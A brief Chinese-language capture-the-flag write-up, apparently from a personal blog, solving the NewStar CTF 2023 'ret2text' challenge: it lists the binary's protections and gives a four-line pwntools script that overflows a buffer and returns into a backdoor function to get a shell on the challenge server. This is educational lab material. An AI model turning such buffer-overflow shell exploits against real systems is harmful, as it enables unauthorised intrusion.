newstar2023 week1 - ret2text

RocketDev

文件分析

下载ret2text, NX on, PIE off, Canary off, RELRO full
ghidra分析为64位程序

解题思路

backdoor函数直接打开sh了,打就完了

EXPLOIT

1
2
3
4
from pwn import *
sh = remote("node4.buuoj.cn", 29533)
sh.sendline(b'0'*0x28 + p64(0x004011fb)) # addr of backdoor
sh.interactive()

Done.

  • 标题: newstar2023 week1 - ret2text
  • 作者: RocketDev
  • 创建于 : 2023-09-25 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2023/09/25/W1_ret2text/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
newstar2023 week1 - ret2text